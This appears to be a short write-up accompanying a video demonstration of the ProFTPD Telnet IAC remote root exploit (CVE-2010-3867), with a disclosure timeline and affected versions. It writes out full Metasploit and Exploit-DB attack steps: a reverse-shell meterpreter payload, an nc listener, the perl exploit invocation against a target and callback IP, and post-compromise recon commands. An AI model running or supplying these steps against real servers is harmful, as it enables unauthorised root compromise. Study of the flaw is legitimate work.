CVE-2010-3867 : ProFTPD IAC Remote Root Exploit
https://www.ispeech.org
Subscribe: http://www.youtube.com/subscription_center?add_user=wowzataz
Blog : http://eromang.zataz.com
Twitter : http://twitter.com/eromang
Metasploit and Exploit-DB exploits demonstrations
Timeline :
Vulnerability reported to vendor by ZDI the 2010-09-24
Coordinated public release of advisory the 2010-11-02
Metasploit exploit released the 2010-11-05
Exploit-DB exploit released the 2010-11-07
PoC provided by:
jduck for Metasploit exploit
Kingcope for Exploit-DB exploit
References :
CVE-2010-3867
EDB-15449
Affected versions :
ProFTPD versions between 1.3.2rc3 and 1.3.3b
Tested on Debian Squeeze with :
ProFTPD proftpd-basic_1.3.3a-4_i386.deb
Description:
This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.
Metasploit demo :
use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid
ipconfig
Exploit-DB demo :
nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig
2010-11-09 00:30:03
source
Gloss